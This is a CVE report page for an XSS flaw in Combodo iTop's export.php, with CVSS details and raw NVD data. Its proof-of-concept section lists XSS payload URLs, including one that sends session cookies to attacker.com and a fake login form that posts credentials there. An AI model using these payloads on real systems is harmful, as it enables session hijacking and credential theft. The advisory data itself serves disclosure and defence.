Security Vulnerability Report
中文
CVE-2025-64167 CVSS 7.1 HIGH

CVE-2025-64167

Published: 2025-11-10 22:15:37
Last Modified: 2025-11-21 13:37:16

Description

Combodo iTop is a web based IT service management tool. Versions prior to 2.7.13 and 3.2.2 are vulnerable to a cross-site scripting attack (leading to JS execution) when editing the URL parameter. Versions 2.7.13 and 3.2.2 don't use export.php, which was deprecated. They use export-v2.php instead.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop < 2.7.13
Combodo iTop < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64167 XSS PoC --> <!-- 攻击者构造恶意URL诱导用户访问 --> <!-- 基本XSS测试 --> https://target-itop.com/pages/export.php?expression=<script>alert(document.cookie)</script> <!-- 绕过过滤的XSS变体 --> https://target-itop.com/pages/export.php?expression=<img src=x onerror=alert(1)> https://target-itop.com/pages/export.php?expression=<svg onload=alert(document.domain)> https://target-itop.com/pages/export.php?expression=<body onload=alert(/XSS/)> <!-- 窃取会话Cookie的完整PoC --> <!-- 攻击者首先搭建接收Cookie的恶意服务器,然后构造如下链接 --> https://target-itop.com/pages/export.php?expression=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- 钓鱼攻击变体 - 伪造登录表单 --> https://target-itop.com/pages/export.php?expression=<form action=https://attacker.com/phish><input name=username><input name=password></form>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64167", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:36.753", "lastModified": "2025-11-21T13:37:15.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. Versions prior to 2.7.13 and 3.2.2 are vulnerable to a cross-site scripting attack (leading to JS execution) when editing the URL parameter. Versions 2.7.13 and 3.2.2 don't use export.php, which was deprecated. They use export-v2.php instead."}, {"lang": "es", "value": "Combodo iTop es una herramienta de gestión de servicios de TI basada en web. Las versiones anteriores a la 2.7.13 y 3.2.2 son vulnerables a un ataque de cross-site scripting (que conduce a la ejecución de JS) al editar el parámetro URL. Las versiones 2.7.13 y 3.2.2 no utilizan export.php, que fue desaprobado. En su lugar, utilizan export-v2.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.13", "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-pr7w-2cr9-5h38", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}